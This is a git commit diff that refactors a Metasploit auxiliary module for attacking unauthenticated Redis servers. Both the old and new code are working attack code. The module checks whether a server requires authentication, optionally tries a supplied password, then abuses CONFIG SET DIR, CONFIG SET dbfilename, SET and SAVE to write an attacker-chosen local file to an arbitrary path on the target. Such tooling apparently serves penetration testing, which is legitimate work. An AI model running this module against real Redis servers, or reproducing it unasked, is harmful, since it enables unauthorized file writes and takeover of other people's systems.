make code more clear
parent
42013c18ba
commit
0d8fc78257
|
@ -24,8 +24,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
['URL', 'http://antirez.com/news/96'],
|
||||
['URL', 'http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/'],
|
||||
['URL', 'http://redis.io/topics/protocol']
|
||||
]
|
||||
))
|
||||
]))
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(6379),
|
||||
|
@ -40,14 +39,14 @@ class Metasploit3 < Msf::Auxiliary
|
|||
], self.class)
|
||||
end
|
||||
|
||||
def read_timeout
|
||||
datastore['READ_TIMEOUT']
|
||||
end
|
||||
|
||||
def peer
|
||||
"#{rhost}:#{rport}"
|
||||
end
|
||||
|
||||
def read_timeout
|
||||
datastore['READ_TIMEOUT']
|
||||
end
|
||||
|
||||
def redis_proto(parts)
|
||||
return if parts.blank?
|
||||
command = "*#{parts.length}\r\n"
|
||||
|
@ -57,23 +56,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
command
|
||||
end
|
||||
|
||||
def send_command(command)
|
||||
command = redis_proto(command)
|
||||
sock.put(command)
|
||||
sock.get_once(-1, read_timeout)
|
||||
end
|
||||
|
||||
def auth?(password)
|
||||
report_service(
|
||||
host: rhost,
|
||||
port: rport,
|
||||
name: 'redis',
|
||||
proto: 'tcp'
|
||||
)
|
||||
|
||||
command = ['AUTH', "#{password}"]
|
||||
data = send_command(command)
|
||||
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
|
||||
def redis_auth?(password)
|
||||
data = send_command(['AUTH', "#{password}"])
|
||||
if data && data.include?('+OK')
|
||||
true
|
||||
else
|
||||
|
@ -81,66 +65,60 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
end
|
||||
|
||||
def send_command(command)
|
||||
sock.put("#{redis_proto(command)}")
|
||||
data = sock.get_once(-1, read_timeout)
|
||||
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump}")
|
||||
data
|
||||
end
|
||||
|
||||
def send_file(path, content)
|
||||
report_service(
|
||||
host: rhost,
|
||||
port: rport,
|
||||
name: 'redis',
|
||||
proto: 'tcp'
|
||||
)
|
||||
|
||||
dirname = File.dirname(path)
|
||||
basename = File.basename(path)
|
||||
|
||||
key = Rex::Text.rand_text_alpha(32)
|
||||
command = ['CONFIG', 'SET', 'DIR', "#{dirname}"]
|
||||
data = send_command(command)
|
||||
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
|
||||
return unless data.include?('+OK')
|
||||
commands = [
|
||||
['CONFIG', 'SET', 'DIR', "#{File.dirname(path)}"],
|
||||
['CONFIG', 'SET', 'dbfilename', "#{File.basename(path)}"],
|
||||
['SET', "#{key}", "#{content}"],
|
||||
['SAVE'],
|
||||
['DEL', "#{key}"]
|
||||
]
|
||||
|
||||
command = ['CONFIG', 'SET', 'dbfilename', "#{basename}"]
|
||||
data = send_command(command)
|
||||
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
|
||||
return unless data.include?('+OK')
|
||||
results = []
|
||||
commands.each do |command|
|
||||
results << send_command(command)
|
||||
end
|
||||
|
||||
command = ['SET', "#{key}", "#{content}"]
|
||||
data = send_command(command)
|
||||
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
|
||||
return unless data.include?('+OK')
|
||||
print_good("#{rhost}:#{rport}: save file to #{path}")
|
||||
return unless results[3] && results[3].include?('+OK')
|
||||
print_good("#{peer} - write data to redis server #{path}")
|
||||
report_note(
|
||||
type: 'redis_unauth_file_upload',
|
||||
host: rhost,
|
||||
port: rport,
|
||||
proto: 'tcp',
|
||||
data: "Save it to #{path} on remote server successfully",
|
||||
data: "write data to redis server #{path}"
|
||||
)
|
||||
|
||||
command = ['SAVE']
|
||||
data = send_command(command)
|
||||
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
|
||||
return unless data.include?('+OK')
|
||||
|
||||
command = ['DEL', "#{key}"]
|
||||
data = send_command(command)
|
||||
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
|
||||
return unless data.include?('+OK')
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
begin
|
||||
connect
|
||||
res = send_command(['PING'])
|
||||
print_status("#{peer} - No Response") unless res
|
||||
|
||||
if res =~ /PONG/
|
||||
content = "\n\n#{File.open(datastore['LocalFile']).read}\n\n\n"
|
||||
send_file(datastore['RemoteFile'], content)
|
||||
elsif res =~ /NOAUTH Authentication required/
|
||||
if auth?(datastore['AUTH_KEY'])
|
||||
content = "\n\n#{File.open(datastore['LocalFile']).read}\n\n\n"
|
||||
send_file(datastore['RemoteFile'], content)
|
||||
unless res
|
||||
print_status("#{peer} - No response")
|
||||
return
|
||||
end
|
||||
|
||||
case res
|
||||
when /PONG/
|
||||
print_status("#{peer} - No authentication protection")
|
||||
content = "\n\n#{File.open(datastore['LocalFile']).read}\n\n\n"
|
||||
send_file(datastore['RemoteFile'], content)
|
||||
when /NOAUTH Authentication required/
|
||||
print_status("#{peer} - Trying to auth redis server")
|
||||
return unless redis_auth?(datastore['AUTH_KEY'])
|
||||
content = "\n\n#{File.open(datastore['LocalFile']).read}\n\n\n"
|
||||
send_file(datastore['RemoteFile'], content)
|
||||
else
|
||||
print_status("#{peer} - #{res}")
|
||||
end
|
||||
|
||||
rescue ::Exception => e
|
||||
|
|
Loading…
Reference in New Issue